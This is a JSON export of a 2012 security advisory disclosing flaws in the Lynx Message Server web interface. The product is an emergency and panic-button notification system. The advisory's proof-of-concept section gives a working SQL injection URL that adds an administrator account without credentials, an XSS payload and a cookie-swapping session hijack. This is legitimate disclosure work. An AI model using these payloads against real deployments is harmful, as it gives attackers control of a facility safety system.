{"id":562,"date":"2012-04-24T14:11:09","date_gmt":"2012-04-24T20:11:09","guid":{"rendered":"http:\/\/www.foofus.net\/?page_id=562"},"modified":"2013-07-08T20:10:09","modified_gmt":"2013-07-08T20:10:09","slug":"micro-technology-services-lynxguide-web-interface-security-issues","status":"publish","type":"page","link":"http:\/\/h.foofus.net\/?page_id=562","title":{"rendered":"Micro Technology Services LynxGuide Web Interface Security Issues"},"content":{"rendered":"<p>1. Summary<\/p>\n<p>The Micro Technology Services Inc. &#8220;Lynx Message Server 7.11.10.2&#8221; and\/or &#8220;LynxTCPService version 1.1.62&#8221; web interface is vulnerable to SQL Injection, Cross-Site Scripting, and other security problems.<\/p>\n<p>2. Description<\/p>\n<p>Lynx is a &#8220;Facility wide Duress and Emergency Notification&#8221; system developed by Micro Technology Services, Inc. (http:\/\/www.lynxguide.com\/) out of Richardson, Texas. The product is designed to &#8220;address the issue of making it more cost effective to install panic buttons and improve group and mass communication in large facilities or groups of facilities on the same network.&#8221; By submitting malicious input to certain fields, it is possible to add administrative users to the system without credentials using SQL injection, and inject code in the security context of the server. With access to session network traffic, It is also possible to hijack sessions and sniff user ID&#8217;s and passwords.<\/p>\n<p>3. Proof of Concept<\/p>\n<p>3a. SQL Injection example &#8211; to add an admin user to the system, visit a URL such as:<\/p>\n<p>http:\/\/victim\/cgi\/email_password.plx?UserID=a&#8217;%3BINSERT+INTO+Users([User],[Password])+VALUES+(&#8216;bede&#8217;,&#8217;bede&#8217;)%3Bselect+Users.[Password],+Users.[User]+from+USERS+where+Users.[User]=&#8217;b<\/p>\n<p>Then go to http:\/\/victim\/cgi\/logon.plx to log in with the newly created account<\/p>\n<p>3b. Cross-Site Scripting (XSS) example &#8211; to generate an XSS popup, visit a URL such as:<\/p>\n<p>http:\/\/victim\/cgi\/wrapper.plx?Destination=addequipment.htm&#038;Title=&lt;script&gt;alert(&#8216;XSS&#8217;)&lt;\/script&gt;<\/p>\n<p>this CGI Binary does require you to be logged in in order to work, limiting its effectiveness.<\/p>\n<p>3c. Session hijacking example &#8211; to change your session to another user&#8217;s currently logged in session, log into the server and intercept the Cookie and change it to the value of another user, perhaps one intercepted with a proxy or sniffer. For example, you might change your own session:<\/p>\n<p>Set-Cookie: Access_Num=1.304931640625e%2B019%7C%7C; path=\/; expires=Fri, 23-Mar-2012 06:59:01 GMT<\/p>\n<p>to that of another user:<\/p>\n<p>Set-Cookie: Access_Num=7.408447265625e%2B019%7C%7C; path=\/; expires=Fri, 23-Mar-2012 06:59:01 GMT<\/p>\n<p>and you will now be logged in as that user<\/p>\n<p>4. Impact<\/p>\n<p>Ability to add users, modify data, inject code in the security context of the server, take over sessions and possibly other attacks.<\/p>\n<p>5. Affected Products<\/p>\n<p>The exact versions of affected software are unknown to the authors. The two services running appear to be:<\/p>\n<p>&#8220;Lynx Message Server 7.11.10.2&#8221; and &#8220;LynxTCPService version 1.1.62&#8221;<\/p>\n<p>6. Solution<\/p>\n<p>The vendor claims that the input validation issues (SQL Injection and XSS) have been fixed in version &#8220;7.12.4.1&#8221;. The authors have not verified these claims. Customers must contact the vendor to arrange for installation of updated software. A fix for the session management and plaintext protocol usage issues is not available. However, the use of a front-end HTTP proxy supporting SSL encryption may partially mitigate these risks.<\/p>\n<p>7. Timetable<\/p>\n<p>2012-03-22 Advisory written<br \/>\n2012-03-22 Vendor responds with intention to analyze and fix issues<br \/>\n2012-04-23 Vendor advises that partial fix is available<br \/>\n2012-05-03 Public disclosure<\/p>\n<p>8. Reference<\/p>\n<p>http:\/\/www.foofus.net\/?page_id=562<\/p>\n<p>9. Credits<\/p>\n<p>bede@foofus.net (Mark Lachniet)<br \/>\npsyonik@foofus.net (David Reflexia)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. Summary The Micro Technology Services Inc. &#8220;Lynx Message Server 7.11.10.2&#8221; and\/or &#8220;LynxTCPService version 1.1.62&#8221; web interface is vulnerable to SQL Injection, Cross-Site Scripting, and other security problems. 2. Description Lynx is a &#8220;Facility wide Duress and Emergency Notification&#8221; system developed by Micro Technology Services, Inc. (http:\/\/www.lynxguide.com\/) out of Richardson, Texas. The product is designed [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":0,"parent":273,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-562","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=562"}],"version-history":[{"count":1,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/562\/revisions"}],"predecessor-version":[{"id":669,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/562\/revisions\/669"}],"up":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/273"}],"wp:attachment":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}